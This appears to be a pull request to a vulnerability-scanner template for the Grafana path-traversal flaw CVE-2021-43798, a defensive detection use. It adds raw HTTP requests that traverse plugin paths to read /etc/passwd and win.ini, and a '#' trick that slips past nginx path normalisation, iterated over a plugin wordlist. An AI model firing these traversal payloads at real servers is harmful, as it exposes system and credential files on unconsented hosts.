### PR TITLE
fix case where nginx is in front of the application

### DIFF
--- a/http/cves/2021/CVE-2021-43798.yaml
+++ b/http/cves/2021/CVE-2021-43798.yaml
@@ -38,12 +38,33 @@ info:
   tags: cve2021,cve,packetstorm,grafana,lfi,vkev,kev,vuln
 
 http:
-  - method: GET
-    path:
-      - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd'
-      - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini'
-      - '{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini'
+  - raw:
+      - |+
+        GET /public/plugins/{{pluginSlug}}/../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
 
+      - |+
+        GET /public/plugins/{{pluginSlug}}/#/../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+
+      - |+
+        GET /public/plugins/{{pluginSlug}}/../../../../../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+
+      - |+
+        GET /public/plugins/{{pluginSlug}}/#/../../../../../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+
+    unsafe: true
+    disable-path-automerge: true
+
+    payloads:
+      pluginSlug: helpers/wordlists/grafana-plugins.txt
+    threads: 50
     stop-at-first-match: true
 
     matchers-condition: and
@@ -55,7 +76,7 @@ http:
 
       - type: regex
         regex:
-          - 'root:.*:0:([0-9]+):'
+          - "root:.*:0:([0-9]+):"
           - '\/tmp\/grafana\.sock'
           - '\[(fonts|extensions|Mail|files)\]'
         condition: or
@@ -63,4 +84,3 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ec09cca5122f67be1738f43f49bec499c9125d34dc5f635939a4f381ba41affa022048a441d4e13c5a7b15c3e2f58843347c25d42c39c104375b4bec5dc97344b053:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2021-43798
- References:

### Template validation

- [X] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [X] Validated with a host running a patched version and/or configuration (avoid False Positive)

### Desc 

When using nginx in front of the application the reverse proxy may remove the "../" a bypass consist to use "#" in the url before the "../". However this can only be done with the "raw http mode". 
More, in a previous version multiple plugins where tested, this was removed in the original file but it is still usefull.

https://nusgreyhats.org/posts/writeups/a-not-so-deep-dive-in-to-grafana-cve-2021-43798/